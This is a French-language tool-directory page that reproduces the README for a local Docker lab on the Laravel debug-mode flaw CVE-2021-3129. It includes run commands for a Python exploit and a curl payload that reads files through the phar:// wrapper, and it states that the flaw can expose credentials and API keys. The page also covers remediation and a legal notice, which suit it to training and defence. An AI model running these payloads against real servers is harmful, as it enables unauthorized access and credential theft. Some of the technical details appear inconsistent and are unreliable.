Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: Laravel Debug Mode RCE - Laboratoire d'exploitation complet avec exploit Python, conteneur Docker et guide d'analyse de sécurité. | Kitploit
Outils/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel Debug Mode RCE - Laboratoire d'exploitation complet avec exploit Python, conteneur Docker et guide d'analyse de sécurité.

Voir le dépôt
18il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-3129 : Laboratoire RCE du mode Debug Laravel

License: MIT Python 3.8+ Docker CVSS: 7.5

Laboratoire pratique pour exploiter CVE-2021-3129 - une vulnérabilité critique de Laravel permettant une lecture de fichiers non authentifiée et un potentiel RCE.

Démarrage rapide

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Qu'est-ce que CVE-2021-3129 ?

PropriétéDétails
SévéritéCVSS 7.5 (Élevé)
AffectéLaravel < 8.4.2, < 7.30.4
ImpactLecture de fichiers arbitraires, divulgation d'informations, RCE potentiel
Authentification requiseNon
Vecteur d'attaqueRéseau

Comment ça marche

  1. Reconnaissance - Identifier Laravel avec le mode debug activé
  2. Validation - Tester le point d'accès /_ide_helper.php
  3. Exploitation - Utiliser le wrapper phar:// pour lire des fichiers
  4. Impact - Extraire les identifiants, clés API, variables d'environnement

Prérequis

  • Docker Desktop
  • Python 3.8+
  • 4 Go de RAM

Configuration (étape par étape)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Résultat attendu

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

Utilisation de l'exploit

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

Tests manuels

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

Remédiation

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

Nettoyage

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

FAQ

Q : Puis-je tester sur Internet ?
R : Non. Ceci est uniquement pour localhost. Ne testez jamais sur des systèmes que vous ne possédez pas.

Q : Cela fonctionnera-t-il sur les versions corrigées ?
R : Non. Laravel 8.4.2+ et 7.30.4+ sont corrigés.

Q : Puis-je modifier l'exploit ?
R : Oui. Le code est entièrement commenté pour l'apprentissage.

Q : Comment capturer le trafic réseau ?
R : Utilisez tcpdump ou Wireshark :

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

Avis légal

⚠️ Uniquement à des fins éducatives

✅ Utilisations autorisées :

  • Apprentissage éducatif
  • Tests de sécurité autorisés
  • Recherche défensive

❌ Utilisations interdites :

  • Accès non autorisé aux systèmes
  • Piratage illégal
  • Dommages aux systèmes

Utilisez uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Ressources

  • CVE-2021-3129
  • Sécurité Laravel
  • Wrappers PHP

Auteur

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Lieu : Bengaluru, Karnataka, Inde

Licence

Licence MIT - Voir le fichier LICENSE

Télécharger l’outil